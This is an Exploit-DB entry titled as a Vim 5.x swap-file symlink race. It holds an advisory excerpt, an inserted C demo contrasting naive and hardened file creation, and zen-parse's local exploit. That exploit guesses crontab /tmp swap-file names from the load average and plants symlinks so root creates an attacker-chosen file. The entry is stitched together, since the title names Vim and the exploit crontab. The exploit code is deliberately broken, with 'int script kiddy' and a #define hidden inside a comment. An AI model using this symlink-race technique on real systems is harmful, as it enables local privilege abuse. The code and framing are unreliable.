Vim 5.x - Swap File Race Condition

EDB-ID: 20967
Author: zen-parse
Type: local
Platform: Linux
Date: 2001-01-26


/*
source: https://www.securityfocus.com/bid/2927/info

Vim is an enhanced version of the popular text editor vi.

A race condition vulnerability exists in the swap file mechanism used by the 'vim' program. The error occurs when a swap file name for a file being opened is symbolically linked to a non-existent file.

By conjecturing the name of a file to be edited by another user, it may be possible for a local user to create a malicious symbolic link to a non-existent file. This could cause the new target file to be created with the permissions of the user running vim. 
*/
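The advisory boils down to one pattern: a file whose name another user can predict is created by following whatever symbolic link is already sitting at that path. The C below is an added illustration, not part of the advisory or of zen-parse's exploit, and it contrasts that naive creation with the mitigated form (O_CREAT|O_EXCL|O_NOFOLLOW, which refuses a pre-planted link) inside a private mkdtemp directory; the paths and function names are constructed for the demo.

```c
/* Added example (not from the original advisory or exploit): a predictable
 * path with a dangling symlink planted at it, opened naively vs. hardened.
 * Everything happens inside a private mkdtemp directory under /tmp. */
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Naive pattern (what the advisory describes): fopen("w") follows a dangling
 * symlink and creates its target with the caller's privileges. Returns 1 if
 * the file was created through the link. */
static int naive_create(const char *path) {
    FILE *f = fopen(path, "w");
    if (!f) return 0;
    fclose(f);
    return 1;
}

/* Hardened pattern: O_CREAT|O_EXCL fails (EEXIST) if anything, including a
 * symlink, already exists at path; O_NOFOLLOW additionally refuses to
 * traverse a link. Returns 1 on success, 0 if the path was occupied. */
static int safe_create(const char *path) {
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0) return 0;   /* refuse rather than follow the planted link */
    close(fd);
    return 1;
}

/* Demo: plant <dir>/.demo.swp -> <dir>/target (a dangling link, constructed
 * here), then try both strategies. Returns 1 when the hardened open refused
 * and the naive open created the link target; -1 on setup failure. */
int demo_swapfile_race(void) {
    char dir[] = "/tmp/swapdemo.XXXXXX";
    char swp[256], target[256];
    int naive_ok, safe_ok, target_exists, result;
    if (!mkdtemp(dir)) return -1;
    snprintf(swp, sizeof swp, "%s/.demo.swp", dir);
    snprintf(target, sizeof target, "%s/target", dir);
    if (symlink(target, swp) != 0) return -1;   /* the pre-planted link */
    safe_ok = safe_create(swp);                 /* expected: 0, EEXIST */
    naive_ok = naive_create(swp);               /* follows link, creates target */
    target_exists = (access(target, F_OK) == 0);
    result = (!safe_ok && naive_ok && target_exists);
    unlink(target); unlink(swp); rmdir(dir);    /* clean up the demo dir */
    return result;
}
```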

/*******************************************************************
             Crontab tmp file race condition

   http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=37771

   Apparently this is fixed. Wonder why it still works. 
      -- zen-parse

                     Local exploit

   Quick and dirty exploit for crontab insecure tmp files
   Redhat 7.0 - kept up2date with up2date
   Checked Tue Jun 26 00:15:32 NZST 2001
   -rw-------    1 root     root         4096 Jun 26 00:15 evil

   Requires root to execute crontab -e while the program is
   running.

   Not really likely to be too big of a problem, I hope.

   Could possibly be useful with the (still unpatched) 
   makewhatis.cron bug.

/*******************************************************************
 #define SAFER [1000]
/*******************************************************************/
int shake(int script kiddy)
{
 int f;
 char r SAFER;
 int w;

 f=fopen("/proc/loadavg","r"); 
 fscanf(f,"%*s %*s %*s %*s %s",r);
 fclose(f);
 w=atoi(r);
 return w;
}

main(int argc,char *argv[])
{
 int p;
 char v SAFER;
 sprintf(v,"/tmp/.crontab.%d.swp",shake());
 symlink("/evil",v);
 while(access("/evil",0))
 {
  for(p=-30;p<0;p++)
  {
   sprintf(v,"/tmp/.crontab.%d.swp",shake()-p);
   symlink("/evil",v);
  }
  sprintf(v,"/tmp/.crontab.%d.swp",shake()-p);
  unlink(v);
 }
 for(p=-100;p<0;p++)
 {
  sprintf(v,"/tmp/.crontab.%d.swp",shake()-p);
  unlink(v);
 }
}

 /*****************************************************************
 **   ***   *       **       *********      ***********************
 **    *    *   **   ******   *******   **   **********************
 **         *   **   **      ********   *******   ***      ********
 **   * *   *       *******   *******   ******  *  *  *  *  *******
 **   ***   *   ***********   **   **   **   *  *  *  *  *  *******
 **   ***   *   ******       ***   ***      ***   **  ****  *******
 *****************************************************************/
         //   
        //  xxxx   xxx    xxx   x   x
       //  xx     x   x  x      x   x
      //   xx     x   x   xxx   x   x
     //    xx     x   x      x   x x  
    //      xxxx   xxx    xxx     x